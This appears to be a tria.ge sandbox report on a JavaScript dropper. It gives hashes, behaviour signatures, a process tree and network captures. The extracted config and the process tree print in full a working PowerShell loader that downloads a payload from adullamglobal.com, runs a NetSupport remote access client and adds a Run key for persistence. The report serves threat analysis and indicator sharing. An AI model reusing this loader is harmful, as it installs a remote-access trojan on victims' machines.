Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    135s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/10/2024, 13:15 UTC

General

  • Target

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js

  • Size

    5.2MB

  • MD5

    a495fbc9b99c98d0a054e937d4dcb944

  • SHA1

    b2a2433591576985adce5da344d72ae669a9cc5f

  • SHA256

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e

  • SHA512

    67ffdf2a2541127bcd1cf05b8f4c47e99844fb9a01ec33d5ff538e6a176eade5636f20c096e783f5d1c5b849ec2ee952a89a3fc35286d1e0e1000c0a21d39c6a

  • SSDEEP

    49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fu+Cz4F9dM2furCz4F9dMW:OkGgkGMkGgkGbkGgkGMkGgkG9

Malware Config

Extracted

Language
ps1
Source
1
$DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
URLs
ps1.dropper

https://adullamglobal.com/work/das.php?13401

exe.dropper

https://adullamglobal.com/work/das.php?13401

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe
        "C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1540

Network

  • flag-us
    DNS
    adullamglobal.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    adullamglobal.com
    IN A
    Response
    adullamglobal.com
    IN A
    79.141.162.186
  • flag-us
    POST
    https://adullamglobal.com/work/fix.php?2046
    wscript.exe
    Remote address:
    79.141.162.186:443
    Request
    POST /work/fix.php?2046 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: adullamglobal.com
    Content-Length: 7
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:29 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=updates.js
    Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
    Content-Length: 2274419
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/octet-stream
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.ax-0001.ax-msedge.net
    g-bing-com.ax-0001.ax-msedge.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    DNS
    r11.o.lencr.org
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    2.18.190.73
    a1887.dscq.akamai.net
    IN A
    2.18.190.80
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    61.45.26.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    61.45.26.184.in-addr.arpa
    IN PTR
    Response
    61.45.26.184.in-addr.arpa
    IN PTR
    a184-26-45-61deploystaticakamaitechnologiescom
  • flag-us
    DNS
    186.162.141.79.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    186.162.141.79.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=2F289F00A97362650A708A22A87563F0; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:28 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 18894B10D9214D3A9C364DB544D487DD Ref B: LON601060108040 Ref C: 2024-10-24T13:15:28Z
    date: Thu, 24 Oct 2024 13:15:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2F289F00A97362650A708A22A87563F0
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:29 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3E7BB815C5CE4ABE814A8980B10CD154 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
    date: Thu, 24 Oct 2024 13:15:28 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    Remote address:
    150.171.27.10:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2F289F00A97362650A708A22A87563F0; MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DC27CC5E6A3945609D12E6D6CE07ABC8 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
    date: Thu, 24 Oct 2024 13:15:29 GMT
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D
    wscript.exe
    Remote address:
    2.18.190.73:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "D2C54317F18E11A735A6475A5F6058D8BAE2F323505325378815102EBB763711"
    Last-Modified: Wed, 23 Oct 2024 10:58:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=12764
    Expires: Thu, 24 Oct 2024 16:48:12 GMT
    Date: Thu, 24 Oct 2024 13:15:28 GMT
    Connection: keep-alive
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    10.27.171.150.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.27.171.150.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.156.103.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.156.103.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://adullamglobal.com/work/das.php?13401
    powershell.exe
    Remote address:
    79.141.162.186:443
    Request
    GET /work/das.php?13401 HTTP/1.1
    Host: adullamglobal.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:33 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Vary: Accept-Encoding
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    geo.netsupportsoftware.com
    client32.exe
    Remote address:
    8.8.8.8:53
    Request
    geo.netsupportsoftware.com
    IN A
    Response
    geo.netsupportsoftware.com
    IN A
    172.67.68.212
    geo.netsupportsoftware.com
    IN A
    104.26.0.231
    geo.netsupportsoftware.com
    IN A
    104.26.1.231
  • flag-us
    GET
    http://geo.netsupportsoftware.com/location/loca.asp
    client32.exe
    Remote address:
    172.67.68.212:80
    Request
    GET /location/loca.asp HTTP/1.1
    Host: geo.netsupportsoftware.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 13:15:37 GMT
    Content-Type: text/html; Charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Ray: 8d7a3c986b0f948d-LHR
    CF-Cache-Status: DYNAMIC
    Access-Control-Allow-Origin: *
    Cache-Control: private
    Set-Cookie: ASPSESSIONIDQQCQBADR=IEOBCDPAAFBIPIABLMGHLFAC; path=/
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    Vary: Accept-Encoding
    cf-apo-via: origin,host
    Referrer-Policy: strict-origin-when-cross-origin
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyhUpNqH9W8t%2FmJnQ6JaeU5eY1ZJm%2BjvfF8KVi4IldniyyManFpQYciBPOgynYcm0YHxGCw8Vzjgv9Stg5yRq6QstsqUcKEuI9BQaWGiaAsxwiJE%2FRdscv%2FSlq4DtMeLe%2BSaTMWga70rGBSb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
  • flag-us
    DNS
    143.159.181.5.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    143.159.181.5.in-addr.arpa
    IN PTR
    Response
    143.159.181.5.in-addr.arpa
    IN PTR
    5-181-159-143 mivocloudcom
  • flag-us
    DNS
    212.68.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.68.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79deploystaticakamaitechnologiescom
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 493712
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B296B5E3F52C4072A680F582D3682D1C Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 619595
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E68ACF3F1B2142DF937229ACA8E15473 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 522409
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 90C2CA5B5848470FB9CB1140F62BC6CA Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 534196
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: FC5405588C85400C92E991F21EA760F4 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • 79.141.162.186:443
    https://adullamglobal.com/work/fix.php?2046
    tls, http
    wscript.exe
    81.2kB
    2.3MB
    1692
    1688

    HTTP Request

    POST https://adullamglobal.com/work/fix.php?2046

    HTTP Response

    200
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    tls, http2
    2.0kB
    9.4kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204
  • 2.18.190.73:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D
    http
    wscript.exe
    522 B
    1.1kB
    6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D

    HTTP Response

    200
  • 79.141.162.186:443
    https://adullamglobal.com/work/das.php?13401
    tls, http
    powershell.exe
    76.5kB
    3.1MB
    1498
    2257

    HTTP Request

    GET https://adullamglobal.com/work/das.php?13401

    HTTP Response

    200
  • 5.181.159.143:443
    http
    client32.exe
    2.0kB
    814 B
    9
    7
  • 172.67.68.212:80
    http://geo.netsupportsoftware.com/location/loca.asp
    http
    client32.exe
    440 B
    1.1kB
    7
    5

    HTTP Request

    GET http://geo.netsupportsoftware.com/location/loca.asp

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    80.4kB
    2.3MB
    1645
    1641

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 8.8.8.8:53
    adullamglobal.com
    dns
    powershell.exe
    63 B
    79 B
    1
    1

    DNS Request

    adullamglobal.com

    DNS Response

    79.141.162.186

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
